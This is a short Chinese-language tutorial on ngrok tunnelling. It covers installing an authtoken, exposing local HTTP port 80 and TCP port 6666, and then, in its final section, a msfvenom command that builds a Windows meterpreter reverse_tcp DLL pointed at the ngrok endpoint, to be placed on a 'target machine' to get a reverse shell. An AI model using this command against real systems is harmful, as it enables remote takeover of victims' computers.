实例讲解
0x00.
demon
之前发了一篇Ngrok&MSF
(内网穿)的文章,由于没时间,现在正好有时间过来测试下。
感谢demon
的耐心教导。
ngrok 是一个反向代理,通过在公共的端点和本地运行的 Web 服务器之间建立一个安全的通道。ngrok 可捕获和分析所有通道上的流量,便于后期分析和重放。
Ngrok的下载地址:https://ngrok.com/download
下面以我的Kali Linux 为例子,下载ngrok。
解压后得出,ngrok包
0X01.
我选择将ngrok复制到/bin
0X02.HTTP
1.安装你的token
去ngrok
的官网找到你的token
ngrok authtoken 6RBm_2CfWq3xAJ3XVK
根据官方文档 使用http
的时候 使用ngrok http 80
(将本地80
端口映射到ngrok
外网),比如我们本机开启了80
端口(apache
)需要映射到外网。
开启apache
服务80
端口
本机中的localhost
图中可以看到,已将本机的80
端口映射到ngrok.io
中
ngrok http 80
我们可以来验证下: http://xxxx571a.ngrok.io
中是否有映射。
0x03 TCP
配置完了Ngrok
上个试了下http
,我再来试试TCP
我们使用 ngrok
帮助参数 tcp
ngrok tcp 6666
将本机的6666
映射到ngrok
的外网中。
0x04 Metasploit
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=(ip填写对应的ngrok对应的ip或者对应的ngrok对应的域名地址也可以) LPORT=(端口填写对应的ngrok的映射的端口) -f dll > /opt/x.dll
放入目标机子上得到反弹
总结:
- 利用ngrok,我们可以实现内网穿透。